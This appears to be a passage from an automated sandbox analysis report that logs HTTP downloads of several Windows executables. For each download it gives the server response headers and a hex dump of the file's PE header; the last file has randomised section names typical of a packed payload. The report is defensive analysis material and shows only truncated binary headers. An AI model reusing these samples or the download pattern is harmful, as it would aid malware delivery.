d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 05 Jul 2024 02:36:12 GMTContent-Type: application/octet-streamContent-Length: 1850368Last-Modified: Fri, 05 Jul 2024 01:34:22 GMTConnection: keep-aliveETag: "66874d9e-1c3c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 60 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 49 00 00 04 00 00 ec e8 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 40 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 40 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 29 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 68 6d 7a 71 6e 65 70 00 30 19 00 00 20 30 00 00 24 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 62 69 70 61 77 6f 6a 00 10 00 00 00 50 49 00 00 04 00 00 00 16 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 49 00 00 22 00 00 00 1a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 